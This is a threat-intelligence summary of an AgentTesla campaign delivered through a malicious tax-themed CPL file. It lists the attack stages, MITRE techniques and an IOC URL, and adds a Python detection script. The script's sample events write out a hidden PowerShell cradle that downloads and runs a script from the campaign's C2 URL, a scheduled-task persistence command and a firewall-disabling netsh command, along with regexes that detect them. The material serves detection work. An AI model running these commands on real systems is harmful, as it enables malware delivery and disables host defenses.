Cyble Research and Intelligence Labs details a multi-stage AgentTesla infection chain delivered via a malicious CPL file embedded in a tax-themed spam email, which triggers PowerShell scripts and a .NET loader to inject AgentTesla. The campaign uses obfuscated scripts, startup-folder and scheduled-task persistence, and in-memory payload injection to steal credentials and other data from infected hosts.
Hashtags: #AgentTesla #Gorgees_Ghada_Tax_2021 #AdobeUpdates.vbs #Clang.vbs #PowerShell
Keypoints
- The infection starts with a spam email containing Gorgees_Ghada_Tax_2021.cpl, leading to PowerShell execution and remote file download.
- The CPL file contains PowerShell code that downloads a malicious script from a hardcoded Blogspot URL and executes it via powershell.exe.
- Obfuscated binary strings in the downloaded PowerShell script are deobfuscated to reveal additional PowerShell scripts, an executable, and a DLL.
- A .NET-based loader injects AgentTesla into system processes, enabling memory-resident payload execution.
- Persistence is achieved through startup-folder scripts (AdobeUpdates.vbs, Clang.vbs) and a scheduled task entry created via schtasks.
- The AgentTesla payload exfiltrates credentials and other data and supports keylogging, clipboard theft, and more.
- Defense evasion includes AMSI bypass and Windows Defender/Firewall disabling, plus UAC manipulation and extensive Defender exclusions.
MITRE Techniques
- [T1566] Phishing – The campaign uses a malicious email with an attached CPL file to entice user action. Quote: “…This email contains an attached archive file, which includes two files, one PDF and another CPL file…”
- [T1059] Command and Scripting Interpreter – The CPL file embeds PowerShell code that fetches and executes a script. Quote: “…PowerShell code, responsible for fetching a malicious PowerShell script from a hardcoded URL…”
- [T1204] User Execution – The CPL file requires a double-click to run, initiating the attack chain. Quote: “…requires only a double-click to initiate its execution.”
- [T1547.001] Startup Folder – Persistence via startup folder is employed to execute scripts at startup. Quote: “startup folder is scanned upon starting the operating system…”
- [T1053.005] Scheduled Task/Job: Scheduled Task – The PowerShell script creates a scheduled task to maintain persistence. Quote: “schtasks /create /sc MINUTE /mo 200 /tn EWxdwwATE /F /tr … AdobeUpdates.vbs”
- [T1140] Deobfuscate/Decode Files or Information – Obfuscated binary strings are deobfuscated to reveal payloads. Quote: “The downloaded powershell script contains several obfuscated binary strings.”
- [T1562.001] Impair Defenses: Disable or Modify Tools – AMSI bypass and Defender manipulation are used. Quote: “stops the Windows Defender services and bypasses the AMSI.”
- [T1562.004] Impair Defenses: Disable or Modify System Firewall – Commands disable firewall protections. Quote: “netsh advfirewall set allprofiles state off.”
- [T1562.007] Impair Defenses: Disable or Modify Cloud Firewall – Cloud-firewall impairment is listed as a defense-evasion technique. Quote: “Impair Defenses: Disable or Modify Cloud Firewall.”
- [T1071] Application Layer Protocol – C2 communications occur via HTTP(S)/application-layer channels to fetch scripts. Quote: “a hardcoded URL cawp1[.]blogspot[.]com/atom.xml”
- [T1055] Process Injection – The .NET loader injects AgentTesla into multiple Windows processes (RegSvcs.exe and Msbuild.exe). Quote: “injects the AgentTesla executable into three distinct executables located at C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, …”
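The following is an added detection example, not code from Cyble's report: it turns the behaviours listed above (CPL-launched PowerShell, a download cradle, the minute-interval scheduled task pointing at a startup-folder .vbs, and the netsh firewall disable) into process-creation rules and runs them over constructed sample events. The event field names (parent, image, cmd) and the sample command lines are assumptions shaped after the quoted commands.

```python
import re

# Constructed sample process-creation events (not from the report), shaped
# like the fields a SOC would query from Sysmon Event ID 1 / Security 4688.
SAMPLE_EVENTS = [
    {"parent": "rundll32.exe", "image": "powershell.exe",   # CPL handler -> PowerShell
     "cmd": "powershell -w hidden -c \"iex((New-Object Net.WebClient)"
            ".DownloadString('https://cawp1.blogspot.com/atom.xml'))\""},
    {"parent": "powershell.exe", "image": "schtasks.exe",
     "cmd": "schtasks /create /sc MINUTE /mo 200 /tn EWxdwwATE /F /tr "
            "\"C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu"
            "\\Programs\\Startup\\AdobeUpdates.vbs\""},
    {"parent": "powershell.exe", "image": "netsh.exe",
     "cmd": "netsh advfirewall set allprofiles state off"},
    {"parent": "explorer.exe", "image": "schtasks.exe",     # benign: should not match
     "cmd": "schtasks /query /tn MyBackup"},
]

# Each rule: (name, MITRE id, predicate over one event). Rules key on the
# behaviours the report describes, not on file hashes, so renamed samples match.
RULES = [
    ("cpl_spawns_powershell", "T1204/T1059",
     lambda e: e["parent"].lower() == "rundll32.exe"
     and e["image"].lower() == "powershell.exe"),
    ("powershell_download_cradle", "T1071",
     lambda e: e["image"].lower() == "powershell.exe"
     and re.search(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b",
                   e["cmd"], re.I) is not None),
    ("schtasks_minute_vbs_in_startup", "T1053.005/T1547.001",
     lambda e: e["image"].lower() == "schtasks.exe"
     and re.search(r"/create\b.*/sc\s+minute\b.*/tr\b.*\\startup\\.*\.vbs",
                   e["cmd"], re.I) is not None),
    ("netsh_firewall_off", "T1562.004",
     lambda e: e["image"].lower() == "netsh.exe"
     and re.search(r"advfirewall\s+set\s+allprofiles\s+state\s+off",
                   e["cmd"], re.I) is not None),
]


def evaluate(events):
    """Return (rule_name, mitre_id, cmd) for every event that trips a rule."""
    return [(name, mitre, e["cmd"])
            for e in events for name, mitre, pred in RULES if pred(e)]


if __name__ == "__main__":
    for name, mitre, cmd in evaluate(SAMPLE_EVENTS):
        print(f"[{mitre}] {name}: {cmd[:70]}")
```

The first sample event trips two rules (the CPL-to-PowerShell parent/child pair and the download cradle), which is the correlation a hunt query for this chain should look for.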
Indicators of Compromise
- [URL] cawp1.blogspot.com/atom.xml – Command-and-control/download URL used by the PowerShell script
Read more: https://cyble.com/blog/agenttesla-malware-targets-users-with-malicious-control-panel-file/